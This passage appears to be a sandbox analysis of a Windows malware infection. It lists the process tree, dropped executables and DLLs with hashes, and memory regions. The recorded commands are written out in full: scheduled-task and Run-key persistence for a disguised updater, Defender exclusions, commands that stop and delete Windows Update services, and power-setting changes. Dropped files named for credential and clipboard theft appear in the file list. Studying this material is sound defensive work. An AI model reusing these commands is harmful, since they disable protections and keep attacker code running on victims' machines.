C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2312 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:3476 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:552 -
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:516 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵PID:1848
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:4416 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:4328
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:3708 -
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1436 -
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:812 -
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3036 -
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1656 -
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:368
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:4592
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵PID:2728
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:3440
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:3684
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:3456
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:3172
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:3512
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4988
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:1244
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3208 -
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe zuhwtyqtfkk2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
PID:4832 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:1064 -
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
PID:4772 -
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵PID:976
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=2⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:644
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
PID:2892
-
C:\Program Files\Notepad\Chrome\updater.exe"C:\Program Files\Notepad\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:556
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 360 -p 2932 -ip 29321⤵PID:960
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
PID:3608
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeC:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe1⤵
- Executes dropped EXE
PID:2148
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Libs\g.logFilesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
C:\Program Files\Notepad\Chrome\updater.exeFilesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
C:\Program Files\Notepad\Chrome\updater.exeFilesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD5358897459512b9d5c2be170ec908d608
SHA1e148b7f56ef6acfb1559371f67c68ce9b8ab6078
SHA2561905dc1d997787318b7e03374d0153fa77c08cf76167758d539b00c48e417d3e
SHA5126edc8ecac30aa74f0eedbc33722878e0b8154e63f6c8f7cadca1b08c039535dc0fb64b046ba4631f269704d9bf7202fa1afb0f858aa5ae508387427b6f71627a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD58808750cf94934c2a6471ccc5f0b932a
SHA1dd1f5c5a7b725ecb0e4e96e0cebb62721e774dab
SHA256ffe821af02d97eeb40bca0f73c858296c854263a5477941c3bc4eb649289d69c
SHA51230b7e3f958621a284e95f2503daa1f5a0a10e01f18ed4e2ce9ebbba356a9d2a5bc4f15d3284863d405c24b9aa9181ec8cdf9def74a223a741aeb51d8190caa29
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeFilesize
244KB
MD543a3e1c9723e124a9b495cd474a05dcb
SHA1d293f427eaa8efc18bb8929a9f54fb61e03bdd89
SHA256619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab
SHA5126717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeFilesize
244KB
MD543a3e1c9723e124a9b495cd474a05dcb
SHA1d293f427eaa8efc18bb8929a9f54fb61e03bdd89
SHA256619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab
SHA5126717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeFilesize
244KB
MD543a3e1c9723e124a9b495cd474a05dcb
SHA1d293f427eaa8efc18bb8929a9f54fb61e03bdd89
SHA256619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab
SHA5126717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeFilesize
244KB
MD543a3e1c9723e124a9b495cd474a05dcb
SHA1d293f427eaa8efc18bb8929a9f54fb61e03bdd89
SHA256619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab
SHA5126717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exeFilesize
244KB
MD543a3e1c9723e124a9b495cd474a05dcb
SHA1d293f427eaa8efc18bb8929a9f54fb61e03bdd89
SHA256619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab
SHA5126717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7
-
C:\Users\Admin\AppData\Local\Temp\805025096232Filesize
84KB
MD562b4bb6eaf5760fcce01b2370315ff94
SHA192ab471ce37ff4967b6e749c4a620dfc5fe008c1
SHA256a717ed5c35b303865fe73c34d3fff58ad38a670158a3857c7953811b7537ddb1
SHA512783342a3e5d12bc30d1b574648e2ea668b512c8ff852b28fabb5e36e19bcc6e401ce8e8b7f29fe33fe56ca495750376d233c1654b842df09eb570561116ddd4e
-
C:\Users\Admin\AppData\Local\Temp\Player3.exeFilesize
244KB
MD543a3e1c9723e124a9b495cd474a05dcb
SHA1d293f427eaa8efc18bb8929a9f54fb61e03bdd89
SHA256619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab
SHA5126717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7
-
C:\Users\Admin\AppData\Local\Temp\Player3.exeFilesize
244KB
MD543a3e1c9723e124a9b495cd474a05dcb
SHA1d293f427eaa8efc18bb8929a9f54fb61e03bdd89
SHA256619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab
SHA5126717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7
-
C:\Users\Admin\AppData\Local\Temp\Player3.exeFilesize
244KB
MD543a3e1c9723e124a9b495cd474a05dcb
SHA1d293f427eaa8efc18bb8929a9f54fb61e03bdd89
SHA256619bbbc9e9ddd1f6b7961cacb33d99c8f558499a33751b28d91085aab8cb95ab
SHA5126717d6be0f25d66ba3689b703b9f1360c172138faa0172168c531f55eb217050c03a41396b7a440e899974d71c2f42b41d07db0ef97751c420facfae1550bfa7
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exeFilesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exeFilesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exeFilesize
3.7MB
MD53006b49f3a30a80bb85074c279acc7df
SHA1728a7a867d13ad0034c29283939d94f0df6c19df
SHA256f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280
SHA512e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dwtjbf2e.1ni.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\ss31.exeFilesize
314KB
MD5dc92b8045d44cd6841d54716a677aaf9
SHA1ca82c1d5c768e6cd39cc4a8d25e274d55b03bd2f
SHA256f57cbf96e67c31e5a568f06589647fcd54310a96ec62853400a69b462967e96b
SHA512cbf9ba9b78e442c918c5f220b5609191d39a18145dbf4a7527162fdc60ad8378d5fdb9f34487d7c589bca98eed6956f5064910ee57453555bf9df5b5cdf538ca
-
C:\Users\Admin\AppData\Local\Temp\ss31.exeFilesize
314KB
MD5dc92b8045d44cd6841d54716a677aaf9
SHA1ca82c1d5c768e6cd39cc4a8d25e274d55b03bd2f
SHA256f57cbf96e67c31e5a568f06589647fcd54310a96ec62853400a69b462967e96b
SHA512cbf9ba9b78e442c918c5f220b5609191d39a18145dbf4a7527162fdc60ad8378d5fdb9f34487d7c589bca98eed6956f5064910ee57453555bf9df5b5cdf538ca
-
C:\Users\Admin\AppData\Local\Temp\ss31.exeFilesize
314KB
MD5dc92b8045d44cd6841d54716a677aaf9
SHA1ca82c1d5c768e6cd39cc4a8d25e274d55b03bd2f
SHA256f57cbf96e67c31e5a568f06589647fcd54310a96ec62853400a69b462967e96b
SHA512cbf9ba9b78e442c918c5f220b5609191d39a18145dbf4a7527162fdc60ad8378d5fdb9f34487d7c589bca98eed6956f5064910ee57453555bf9df5b5cdf538ca
-
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dllFilesize
89KB
MD5d3074d3a19629c3c6a533c86733e044e
SHA15b15823311f97036dbaf4a3418c6f50ffade0eb9
SHA256b1f486289739badf85c2266b7c2bbbc6c620b05a6084081d09d0911c51f7c401
SHA5127dd731fd26085d2a4f3963acd758a42a457e355117b50478bc053180cb189f5f3428806e29d29adfb96370067ff45e36950842de18b658524b72019027be62cf
-
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dllFilesize
89KB
MD5d3074d3a19629c3c6a533c86733e044e
SHA15b15823311f97036dbaf4a3418c6f50ffade0eb9
SHA256b1f486289739badf85c2266b7c2bbbc6c620b05a6084081d09d0911c51f7c401
SHA5127dd731fd26085d2a4f3963acd758a42a457e355117b50478bc053180cb189f5f3428806e29d29adfb96370067ff45e36950842de18b658524b72019027be62cf
-
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\clip64.dllFilesize
89KB
MD5d3074d3a19629c3c6a533c86733e044e
SHA15b15823311f97036dbaf4a3418c6f50ffade0eb9
SHA256b1f486289739badf85c2266b7c2bbbc6c620b05a6084081d09d0911c51f7c401
SHA5127dd731fd26085d2a4f3963acd758a42a457e355117b50478bc053180cb189f5f3428806e29d29adfb96370067ff45e36950842de18b658524b72019027be62cf
-
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dllFilesize
1.0MB
MD52c4e958144bd089aa93a564721ed28bb
SHA138ef85f66b7fdc293661e91ba69f31598c5b5919
SHA256b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855
SHA512a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6
-
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dllFilesize
1.0MB
MD52c4e958144bd089aa93a564721ed28bb
SHA138ef85f66b7fdc293661e91ba69f31598c5b5919
SHA256b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855
SHA512a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6
-
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dllFilesize
1.0MB
MD52c4e958144bd089aa93a564721ed28bb
SHA138ef85f66b7fdc293661e91ba69f31598c5b5919
SHA256b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855
SHA512a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6
-
C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dllFilesize
1.0MB
MD52c4e958144bd089aa93a564721ed28bb
SHA138ef85f66b7fdc293661e91ba69f31598c5b5919
SHA256b597b1c638ae81f03ec4baafa68dda316d57e6398fe095a58ecc89e8bcc61855
SHA512a0e3b82bbb458018e368cb921ed57d3720945e7e7f779c85103370a1ae65ff0120e1b5bad399b9315be5c3e970795734c8a82baf3783154408be635b860ee9e6
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
memory/556-325-0x00007FF7AE5C0000-0x00007FF7AE97D000-memory.dmpFilesize
3.7MB
-
memory/556-259-0x00007FF7AE5C0000-0x00007FF7AE97D000-memory.dmpFilesize
3.7MB
-
memory/636-177-0x0000000002BB0000-0x0000000002CE4000-memory.dmpFilesize
1.2MB
-
memory/636-176-0x0000000002A30000-0x0000000002BA3000-memory.dmpFilesize
1.4MB
-
memory/644-334-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmpFilesize
8.0MB
-
memory/644-331-0x000002694A300000-0x000002694A340000-memory.dmpFilesize
256KB
-
memory/644-327-0x000002694A2C0000-0x000002694A2E0000-memory.dmpFilesize
128KB
-
memory/644-343-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmpFilesize
8.0MB
-
memory/644-330-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmpFilesize
8.0MB
-
memory/644-341-0x000002695AB60000-0x000002695AB80000-memory.dmpFilesize
128KB
-
memory/644-345-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmpFilesize
8.0MB
-
memory/644-340-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmpFilesize
8.0MB
-
memory/644-333-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmpFilesize
8.0MB
-
memory/644-337-0x000002695AB60000-0x000002695AB80000-memory.dmpFilesize
128KB
-
memory/644-336-0x00007FF6D0770000-0x00007FF6D0F64000-memory.dmpFilesize
8.0MB
-
memory/1664-233-0x000002956B2E0000-0x000002956B2F0000-memory.dmpFilesize
64KB
-
memory/1664-232-0x000002956B2E0000-0x000002956B2F0000-memory.dmpFilesize
64KB
-
memory/1664-234-0x000002956B2E0000-0x000002956B2F0000-memory.dmpFilesize
64KB
-
memory/1792-216-0x0000019671E50000-0x0000019671E60000-memory.dmpFilesize
64KB
-
memory/1792-213-0x0000019671E50000-0x0000019671E60000-memory.dmpFilesize
64KB
-
memory/1792-214-0x0000019671E50000-0x0000019671E60000-memory.dmpFilesize
64KB
-
memory/1792-215-0x0000019671E50000-0x0000019671E60000-memory.dmpFilesize
64KB
-
memory/2460-184-0x00007FF646A80000-0x00007FF646E3D000-memory.dmpFilesize
3.7MB
-
memory/2460-220-0x00007FF646A80000-0x00007FF646E3D000-memory.dmpFilesize
3.7MB
-
memory/2832-198-0x000001F2E1400000-0x000001F2E1410000-memory.dmpFilesize
64KB
-
memory/2832-188-0x000001F2E13D0000-0x000001F2E13F2000-memory.dmpFilesize
136KB
-
memory/2832-199-0x000001F2E1400000-0x000001F2E1410000-memory.dmpFilesize
64KB
-
memory/3208-307-0x00000298F6B90000-0x00000298F6BA0000-memory.dmpFilesize
64KB
-
memory/3208-308-0x00000298F6B90000-0x00000298F6BA0000-memory.dmpFilesize
64KB
-
memory/3208-309-0x00000298F6B90000-0x00000298F6BA0000-memory.dmpFilesize
64KB
-
memory/3208-319-0x00007FF409FF0000-0x00007FF40A000000-memory.dmpFilesize
64KB
-
memory/3208-320-0x00000298F6B90000-0x00000298F6BA0000-memory.dmpFilesize
64KB
-
memory/4416-288-0x00007FF4EC920000-0x00007FF4EC930000-memory.dmpFilesize
64KB
-
memory/4416-273-0x0000028F274E0000-0x0000028F274F0000-memory.dmpFilesize
64KB
-
memory/4416-289-0x0000028F41680000-0x0000028F4168A000-memory.dmpFilesize
40KB
-
memory/4416-291-0x0000028F41690000-0x0000028F41698000-memory.dmpFilesize
32KB
-
memory/4416-293-0x0000028F416D0000-0x0000028F416DA000-memory.dmpFilesize
40KB
-
memory/4416-287-0x0000028F416A0000-0x0000028F416BC000-memory.dmpFilesize
112KB
-
memory/4416-286-0x0000028F41530000-0x0000028F4153A000-memory.dmpFilesize
40KB
-
memory/4416-285-0x0000028F41450000-0x0000028F4146C000-memory.dmpFilesize
112KB
-
memory/4416-275-0x0000028F274E0000-0x0000028F274F0000-memory.dmpFilesize
64KB
-
memory/4416-274-0x0000028F274E0000-0x0000028F274F0000-memory.dmpFilesize
64KB
-
memory/4416-290-0x0000028F416E0000-0x0000028F416FA000-memory.dmpFilesize
104KB
-
memory/4416-292-0x0000028F416C0000-0x0000028F416C6000-memory.dmpFilesize
24KB
-
memory/4772-133-0x0000000000B50000-0x0000000000F9A000-memory.dmpFilesize
4.3MB
-
memory/4832-332-0x00007FF7F92A0000-0x00007FF7F92B6000-memory.dmpFilesize
88KB